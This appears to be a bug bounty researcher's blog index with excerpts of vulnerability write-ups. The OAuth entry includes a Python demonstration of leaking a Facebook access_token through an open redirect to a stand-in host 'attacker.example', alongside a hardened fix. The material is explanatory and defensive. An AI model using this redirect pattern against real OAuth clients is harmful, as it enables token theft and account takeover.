Tricky out-of-band RCE via Java EL injection

It’s been a long period of silence here. I haven’t been blogging much lately, mostly because I can’t spend much time online due to health conditions, and there was nothing special in my findings that would be worth a blog post. I decided to write when there is some unique or less-documented behavior in my findings.

… 
 

OAuth authentication bypass on Airbnb acquisition using 1-char Open Redirect

This finding was part of the Hack the World 2017 event. TL;DR: it was possible to leak the Facebook access_token to an external domain and then authorize on the site on behalf of the user using that token.
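To make the TL;DR concrete, here is an added illustration (not code from the original post, and not the Airbnb bug itself): in the OAuth implicit grant the access_token comes back in the URL fragment, and a browser carries that fragment along when the callback page answers with a 302 to an open redirect, so the token lands on whatever host the redirect points at. The one-character bypass of the original write-up is not reproduced here; the protocol-relative `//host` trick shown against a naive "starts with a slash" check is a generic stand-in for that class of flaw. The hostnames, the `next` parameter and the token value are all made up.

```python
from typing import Callable, Optional
from urllib.parse import urljoin, urlsplit, parse_qs

TRUSTED_HOST = "client.example"  # hypothetical OAuth client host (assumption)

# Constructed sample: the identity provider (implicit grant) has just sent the
# browser back to the client's callback with the token in the URL fragment.
# The attacker earlier lured the victim into starting the login with a
# poisoned `next` parameter (hypothetical parameter name).
POISONED_CALLBACK = (
    "https://client.example/oauth/callback?next=//attacker.example/collect"
    "#access_token=EAAB-fake-token-123&token_type=bearer"
)


def browser_follow(current_url: str, location: str) -> str:
    """Resolve a 302 Location header the way a browser does.

    The Location is resolved relative to the current URL, and if the target
    has no fragment of its own the browser keeps the fragment of the current
    URL (RFC 7231 section 7.1.2). Fragments are never sent to the server, so
    the redirecting site cannot even see what it is forwarding.
    """
    target = urljoin(current_url, location)
    if "#" not in target and "#" in current_url:
        target += "#" + current_url.split("#", 1)[1]
    return target


def next_param(callback_url: str) -> str:
    return parse_qs(urlsplit(callback_url).query).get("next", ["/"])[0]


def vulnerable_callback(callback_url: str) -> str:
    """Location header emitted by a client with a naive open-redirect check."""
    nxt = next_param(callback_url)
    # Flawed check: "begins with '/', so it must be a path on our own site".
    # A protocol-relative URL ("//host/path") also begins with '/'.
    return nxt if nxt.startswith("/") else "/"


def hardened_callback(callback_url: str) -> str:
    """Location header emitted after fixing the check."""
    nxt = next_param(callback_url)
    # Resolve exactly as the browser will, then compare the resulting origin
    # instead of inspecting a prefix of the raw string.
    resolved = urlsplit(urljoin(callback_url, nxt))
    if resolved.scheme == "https" and resolved.netloc == TRUSTED_HOST:
        return nxt
    return "/"


def leaked_token(final_url: str) -> Optional[str]:
    """Return the access_token if it ended up on a host we do not trust."""
    parts = urlsplit(final_url)
    if parts.netloc == TRUSTED_HOST:
        return None
    return parse_qs(parts.fragment).get("access_token", [None])[0]


def run(handler: Callable[[str], str]) -> Optional[str]:
    """Drive one callback handler with the poisoned URL; returns any leaked token."""
    location = handler(POISONED_CALLBACK)
    final_url = browser_follow(POISONED_CALLBACK, location)
    return leaked_token(final_url)


if __name__ == "__main__":
    print("vulnerable:", run(vulnerable_callback))  # attacker receives the token
    print("hardened:  ", run(hardened_callback))    # None: token stays on the client host
```

The important detail for both the hunter and the defender is that the token never touches the redirecting server; the leak is entirely in browser behavior, which is why an open redirect on an OAuth callback is worth far more than a generic phishing primitive. The fix is to validate the fully resolved origin, or better, to allow only an exact-match list of post-login destinations.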

 

Improving your success as bug bounty hunter

A large share of bug bounty hunters do not care about the quality of their reports. I was no exception. …

 

How a bug on the CloudFlare «Always Online» page could lead to an Unvalidated Redirect on any site, including hacker.one

Hello. This finding is closely related to https://hackerone.com/reports/214620, but uses a flaw in the URL parsing on the CloudFlare error page. …

 

One more way to exploit a Stored Self-XSS

Self-XSS is better than no XSS. ©Captain Obvious.

Hello. In this blog post, I will describe one more way to exploit a Self-XSS. This type of XSS is usually underestimated because, on its own, it can only be triggered by the victim against themselves.
However, there are a lot of ways to convert it into a proper XSS. Things that can be useful in chains: …

 

How an Access Control issue in a Facebook game turned me from a dev into a security researcher

Hello. Since this is my first blog post, I’ll start my stories from the beginning – from the first bug that made me seriously think about an infosec career. …